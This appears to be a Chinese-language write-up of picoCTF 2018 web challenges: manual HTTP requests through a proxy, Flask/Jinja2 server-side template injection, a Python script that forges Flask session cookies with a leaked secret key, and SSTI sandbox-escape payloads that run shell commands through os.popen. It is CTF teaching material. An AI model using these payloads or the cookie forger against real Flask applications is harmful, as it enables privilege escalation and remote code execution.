2018picoctf复现I

日常复现补坑，来自2018picoctf的好题

Artisinal Handcrafted HTTP 3

We found a hidden flag server hiding behind a proxy, but the proxy has some… interesting ideas of what qualifies someone to make HTTP requests. Looks like you’ll have to do this one by hand. Try connecting via nc 2018shell1.picoctf.com 58662, and use the proxy to send HTTP requests to flag.local. We’ve also recovered a username and a password for you to use on the login page: realbusinessuser/potoooooooo.

在验证之后会有一个手动提交http请求的shell

跟着题目走

GET / HTTP/1.1
Host: flag.local

HTTP/1.1 200 OK
x-powered-by: Express
content-type: text/html; charset=utf-8
content-length: 321
etag: W/"141-LuTf9ny9p1l454tuA3Un+gDFLWo"
date: Mon, 15 Oct 2018 14:27:00 GMT
connection: close


                <html>
                        <head>
                                <link rel="stylesheet" type="text/css" href="main.css" />
                        </head>
                        <body>
                                <header>
                                        <h1>Real Business Internal Flag Server</h1>
                                        <a href="/login">Login</a>
                                </header>
                                <main>
                                        <p>You need to log in before you can see today's flag.</p>
                                </main>
                        </body>
                </html>

然后继续send /login GET

GET /login HTTP/1.1
Host: flag.local

HTTP/1.1 200 OK
x-powered-by: Express
content-type: text/html; charset=utf-8
content-length: 498
etag: W/"1f2-UE5AGAqbLVQn1qrfKFRIqanxl9I"
date: Mon, 15 Oct 2018 14:28:51 GMT
connection: close


                <html>
                        <head>
                                <link rel="stylesheet" type="text/css" href="main.css" />
                        </head>
                        <body>
                                <header>
                                        <h1>Real Business Internal Flag Server</h1>
                                        <a href="/login">Login</a>
                                </header>
                                <main>
                                        <h2>Log In</h2>

                                        <form method="POST" action="login">
                                                <input type="text" name="user" placeholder="Username" />
                                                <input type="password" name="pass" placeholder="Password" />
                                                <input type="submit" />
                                        </form>
                                </main>
                        </body>
                </html>

跟着题目提示send user=realbusinessuser&pass=potoooooooo

POST /login HTTP/1.1
Host: flag.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
user=realbusinessuser&pass=potoooooooo

HTTP/1.1 302 Found
x-powered-by: Express
set-cookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D; Path=/
location: /
vary: Accept
content-type: text/plain; charset=utf-8
content-length: 23
date: Mon, 15 Oct 2018 14:31:17 GMT
connection: close

然后发现一个302 redirect，并带有cookie，发包

GET / HTTP/1.1
Host: flag.local
Cookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D

HTTP/1.1 200 OK
x-powered-by: Express
content-type: text/html; charset=utf-8
content-length: 438
etag: W/"1b6-P3X+Gp97q63F5nCePqT+lsVPEas"
date: Mon, 15 Oct 2018 14:38:42 GMT
connection: close


                <html>
                        <head>
                                <link rel="stylesheet" type="text/css" href="main.css" />
                        </head>
                        <body>
                                <header>
                                        <h1>Real Business Internal Flag Server</h1>
                                        <div class="user">Real Business Employee</div>
                                        <a href="/logout">Logout</a>
                                </header>
                                <main>
                                        <p>Hello <b>Real Business Employee</b>!  Today's flag is: <code>picoCTF{0nLY_Us3_n0N_GmO_xF3r_pR0tOcol5_a87a}</code>.</p>
                                </main>
                        </body>
                </html>

Flaskcards

We found this fishy website for flashcards that we think may be sending secrets. Could you take a look?

首页提供两个功能，一个注册一个登陆，未发现异常，随机注册账号并登陆

登陆后发现有三个功能，一个生成card，一个显示card，一个show出u’r not admin 的页面

然后这题是flask-server-side-template-injection

参考链接 服务端模板注入

通过发送4发现能解析

查看config发现flag

picoCTF{secret_keys_to_the_kingdom_584f8327}

Flaskcards Skeleton Key

Nice! You found out they were sending the Secret_key: 385c16dd09098b011d0086f9e218a0a2. Now, can you find a way to log in as admin?

参考链接 how cookie work in Flask application

这题是flask cookie and template injection

flask_cookie_编码解码脚本

查阅发现flask通过sercet_key对cookie的session进行加密

将解码后的userid值置换为1然后编码添加到cookie中即可出flag（将普通用户转为admin）

from flask.sessions import SecureCookieSessionInterface
from itsdangerous import URLSafeTimedSerializer

class SimpleSecureCookieSessionInterface(SecureCookieSessionInterface):
    # Override method
    # Take secret_key instead of an instance of a Flask app
    def get_signing_serializer(self, secret_key):
        if not secret_key:
            return None
        signer_kwargs = dict(
            key_derivation=self.key_derivation,
            digest_method=self.digest_method
        )
        return URLSafeTimedSerializer(secret_key, salt=self.salt,
                                      serializer=self.serializer,
                                      signer_kwargs=signer_kwargs)


def decodeFlaskCookie(secret_key, cookieValue):
    sscsi = SimpleSecureCookieSessionInterface()
    signingSerializer = sscsi.get_signing_serializer(secret_key)
    return signingSerializer.loads(cookieValue)

# Keep in mind that flask uses unicode strings for the
# dictionary keys


def encodeFlaskCookie(secret_key, cookieDict):
    sscsi = SimpleSecureCookieSessionInterface()
    signingSerializer = sscsi.get_signing_serializer(secret_key)
    return signingSerializer.dumps(cookieDict)

cookie = decodeFlaskCookie('385c16dd09098b011d0086f9e218a0a2',
                          '.eJwljzFqBDEMAP_i-gpJtmTpPrNYskRCIIHduyrk77mQbpqBme921JnXW7s_zmfe2vG-273VZhNnJ7AoXSHLWVERs6rPsvDYzBNrRI1U8RfBAFrTOu1U2kBDqChsdTADpzE7Ti6sTOhUwloQMkgn6-xZJpFJiFvAe7u1uM46Hl8f-fnqEbRUW2NQJCiVy1A3IzXckTbDgpLpz3teef5PWPv5BaAZPmI.DpSgrw.SGhImnmWlX33-8gs-0L8kJWC3IY')

cookie[u'user_id'] = u'1'

print encodeFlaskCookie('385c16dd09098b011d0086f9e218a0a2',
                          cookie)

picoCTF{1_id_to_rule_them_all_d77c1ed6}

参考链接 wp1 wp2

Flaskcards and Freedom

There seem to be a few more files stored on the flash card server but we can’t login. Can you?
Hint:
・There’s more to the original vulnerability than meets the eye.
・Can you leverage the injection technique to get remote code execution?
・Sorry, but the database still reverts every 2 hours.

模板注入，flask配合沙盒逃逸进行远程代码执行

{{[].__class__.__base__.__subclasses__()}}

发现回显中有”warings.catch_warnings”可进行逃逸

参考链接 Flask jinja2模板注入思路总结 Flask & Jinja2 SSTI

命令执行payload

1
{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__['__builtins__'].eval('__import__("os").popen("ls").read()')}}
{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat flag").read()')}}

2
{{((''|attr(request.args.param)|attr(request.args.param2))[1]|attr(request.args.param3))()[197](request.args.param4).open().read()}}

picoCTF{R_C_E_wont_let_me_be_76de9280}

参考链接

---

服务端模板注入

how cookie work in Flask application

flask_cookie_编码解码脚本

wp1 wp2

Flask jinja2模板注入思路总结 Flask & Jinja2 SSTI

后续补坑。。